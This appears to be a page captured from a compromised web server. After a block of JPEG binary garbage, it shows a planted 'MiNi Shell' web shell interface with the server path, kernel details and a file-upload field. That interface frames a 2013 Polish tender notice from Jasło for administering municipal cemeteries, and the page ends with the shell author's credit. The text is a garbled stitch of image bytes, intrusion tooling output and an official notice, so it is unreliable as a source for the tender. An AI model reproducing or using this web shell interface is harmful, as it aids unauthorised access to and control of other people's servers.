JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131202/495576-N-2013.html

<p class="kh_header"><b>Jasło: Administrowanie cmentarzami komunalnymi w Jaśle</b><br>
<b>Numer ogłoszenia: 495576 - 2013; data zamieszczenia: 02.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Jasło , ul. Rynek 12, 38-200 Jasło, woj. podkarpackie, tel. 13 4486311, faks 13 4486360.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jaslo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Administrowanie cmentarzami komunalnymi w Jaśle.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1 Przedmiotem zamówienia jest w szczególności:

a.	Administrowanie cmentarzem komunalnym przy ul. Mickiewicza w Jaśle, obejmującym działkę ewidencyjną nr 600, Obręb nr 16 - Kaczorowy o pow. 11,7569 ha wraz z infrastrukturą komunalną, t.j.:
-	budynkiem Administratora Cmentarzy Komunalnych w Jaśle, w skład którego wchodzą: lokal biurowy Administratora, lokal mieszkalny, lokal użytkowy, garaż i magazyn, 
-	Domem Przedpogrzebowym wraz z wyposażeniem,
-	sektorami grzebalnymi,
-	drogami dojazdowymi i wewnętrznymi, alejkami i parkingami.
b.	Administrowanie cmentarzem komunalnym przy ul. Zielonej w Jaśle obejmującym  działki ewidencyjne nr 2432/2, 2432/3 i 2432/4 Obręb nr 8-Centrum o łącznej pow. 2,7000 ha wraz z infrastrukturą komunalną, t.j.:
-	budynkiem socjalnym,
-	Domem Przedpogrzebowym do wystawiania trumien ze zwłokami lub szczątkami oraz do odprawiania ceremonii pogrzebowych,
-	sektorami grzebalnymi,
-	drogami dojazdowymi i wewnętrznymi oraz alejkami.
c.	Administrowanie cmentarzem komunalnym przy ul. Gajowej w Jaśle obejmującym działki nr 272/3 i 273/5 Obręb nr 14 - Niegłowice o łącznej pow. 1,4837 ha wraz z infrastrukturą komunalną, t.j.:
-	barakiem przenośnym,
-	sektorami grzebalnymi,
-	drogami dojazdowymi i wewnętrznymi,  alejkami i parkingiem.

1.2. W ramach administrowania cmentarzami komunalnymi w Jaśle do podstawowych obowiązków administratora należy w szczególności:
1.	prowadzenie ksiąg cmentarnych i dokumentacji cmentarzy,
2.	pobieranie i odprowadzanie na rachunek Miasta Jasła jednorazowych opłat za miejsce na cmentarzu wg stawek każdorazowo określonych Uchwałą Rady Miejskiej Jasła w sprawie zasad korzystania z cmentarzy komunalnych w Jaśle, które na dzień zawarcia umowy określa Załącznik Nr 1 do umowy,
3.	wskazywanie i udostępnianie miejsc pochówku (groby, miejsca pod groby zgodnie z planami sektorów grzebalnych),
4.	zapewnienie wykopania i zasypania grobu ziemnego,
5.	zapewnienie wykonania pochówku w grobie murowanym,
6.	zapewnienie wykonania ekshumacji,
7.	nadzór nad budową i remontami grobów,
8.	wydawanie zezwoleń na prowadzenie prac ziemnych, budowlanych, remontowych i kamieniarskich przy grobach, z wyłączeniem zezwoleń na prowadzenie prac konserwatorskich, restauratorskich i budowlanych grobu wpisanego do rejestru zabytków lub znajdującego się w najbliższym jego otoczeniu, które wymaga uzyskania pozwolenia wojewódzkiego konserwatora zabytków (dotyczy cmentarza komunalnego przy ul. Zielonej) oraz zezwoleń na adaptację grobu ziemnego na grób murowany, na przeprowadzenie której zgodę wyraża Burmistrz Miasta Jasła,
9.	wynajem kaplicy - pomieszczenia do odbywania ceremonii pogrzebowych przy 
ul. Mickiewicza,
10.	wynajem budynku do odbywania ceremonii pogrzebowych przy ul. Zielonej,
11.	przyjmowanie zwłok i przetrzymanie ich do czasu pochówku,
12.	pobieranie i odprowadzanie na rachunek Miasta Jasła opłat za usługi cmentarne wymienione w ppkt od 3 do 11, wg stawek  każdorazowo ustanowionych przez Burmistrza Miasta Jasła, które na dzień zawarcia umowy określa w Załącznik Nr 2 do umowy,
13.	utrzymanie w należytym stanie technicznym, sanitarnym i porządkowym:
-	domu przedpogrzebowego wraz z kaplicą - pomieszczeniem do odprawiania     ceremonii pogrzebowych -  przy ul. Mickiewicza,
-	budynku do odprawiania ceremonii pogrzebowych  przy ul. Zielonej,
-	budynku socjalnego przy ul. Zielonej,
-	budynku Administratora Cmentarzy Komunalnych w Jaśle,
-	baraku przenośnego przy ul. Gajowej
oraz pokrywanie kosztów z tym związanych,
14.	zapewnienie odpowiedniego oświetlenia i ogrzewania budynków, dostawy energii elektrycznej, wody i odprowadzania ścieków,
15.	pokrywanie kosztów ogrzewania, energii elektrycznej, wody i odprowadzania ścieków z wyłączeniem kosztów ogrzewania, energii elektrycznej, wody i odprowadzania ścieków dotyczących lokalu mieszkalnego i użytkowego, które pokrywają najemcy tych lokali wg wskazań odrębnych liczników lub w części proporcjonalnej do zajmowanej powierzchni w stosunku do powierzchni całkowitej budynku,
16.	wykonywanie i pokrywanie kosztów napraw oraz konserwacji budynków i ich wyposażenia w zakresie obciążającym wynajmującego,
17.	zapewnienie wykonywania obowiązkowych przeglądów technicznych powierzonych budynków i ich instalacji oraz pokrywanie kosztów z tym związanych,
18.	prowadzenie książek obiektów budowlanych  dla budynków określonych w ppkt 13,
19.	utrzymanie w należytym stanie porządkowym i sanitarnym powierzchni cmentarzy, 
w szczególności: dróg dojazdowych i wewnętrznych oraz alejek, parkingów, terenów zieleni przez wykonywanie cięć sanitarno-pielęgnacyjnych drzew i krzewów, wycinanie chwastów, wykaszanie trawy i usuwanie opadłych liści, także właściwa konserwacja bram i ogrodzeń oraz pokrywanie kosztów z tym związanych,
20.	zapewnienie oświetlenia cmentarzy w godzinach ich otwarcia,
21.	utrzymanie w należytym stanie i konserwacja oświetlenia cmentarzy oraz pokrywanie kosztów zużytej energii elektrycznej i konserwacji,
22.	zapewnienie w uzgodnieniu z Zamawiającym odpowiedniej ilości kontenerów na odpady oraz wywóz odpadów, nieczystości stałych i płynnych oraz pokrywanie kosztów związanych z wywozem odpadów,
23.	zapewnienie całorocznego funkcjonowania ustępów publicznych na cmentarzach przy ul. Zielonej i ul. Mickiewicza oraz w dniach od 30 października do dnia 2 listopada na cmentarzu przy ul. Gajowej oraz pokrywanie kosztów z tym Związanych,
24.	utrzymanie zimowe dróg dojazdowych i wewnętrznych, alejek, parkingów, chodników, a w szczególności odśnieżanie i usuwanie śliskości oraz pokrywanie kosztów z tym związanych,
25.	utrzymanie w należytym stanie technicznym i estetycznym tablic ogłoszeniowych umieszczonych na obiektach cmentarnych oraz pokrywanie kosztów z tym związanych,
26.	usuwanie skutków aktów wandalizmu na terenie przejętym w administrowanie,
27.	zapewnienie całodobowej dyspozycyjności w świadczeniu czynności określonych umową w siedzibie Administratora oraz w dni robocze w godzinach od 8.00 do 16.00 w budynku socjalnym na cmentarzu komunalnym przy ul. Zielonej.
1.3. Z tytułu administrowania cmentarzami komunalnymi w Jaśle wykonawca otrzyma wynagrodzenie miesięczne stanowiące, określoną w procentach w Formularzu Oferty (załącznik Nr 1 do SIWZ), część rzeczywistych miesięcznych przychodów pomniejszonych o podatek VAT z opłat pobieranych za usługi określone w pkt 3.2 ppkt 12 SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.37.11.10-8, 98.37.11.11-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy wykonawca zobowiązany jest do wniesienia wadium w wysokości 5.000,00 zł;</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, że wykonują lub wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności gospodarczej jest krótszy - w tym okresie, co najmniej jedną usługę polegającą na administrowaniu lub zarządzaniu cmentarzami (zgodnie z ustawą z dnia 31 stycznia 1959 r. o cmentarzach i chowaniu zmarłych oraz aktów wykonawczych wydanych na podstawie tej ustawy) na podstawie zawartej pisemnej umowy oraz załączą dowody określające, czy usługa ta została wykonana lub jest wykonywana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać, że są ubezpieczeni od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, minimalna suma gwarancyjna ubezpieczenia 100.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Co najmniej jedna usługa polegającą na administrowaniu lub zarządzaniu cmentarzami (zgodnie z ustawą z dnia 31 stycznia 1959 r. 
o cmentarzach i chowaniu zmarłych oraz aktów wykonawczych wydanych na podstawie tej ustawy) na podstawie zawartej pisemnej umowy.;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Umowa zostanie zawarta w terminach określonych w art. 94 ustawy Prawo Zamówień Publicznych, na warunkach określonych w projekcie  umowy (zał. Nr 5 do SIWZ).
2)	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany. 
3)	Warunki zmian postanowień zawartej umowy:
a)	wystąpienie istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży 
w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrota.podkarpackie.pl/pl/bip/gminy/um_jaslo<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Jaśle, 38-200 Jasło, ul. Rynek 12, pok. nr 205.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2013 godzina 09:00, miejsce: Urząd Miasta w Jaśle, 38-200 Jasło, ul. Rynek 12, pok. nr 19 /Kancelaria/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com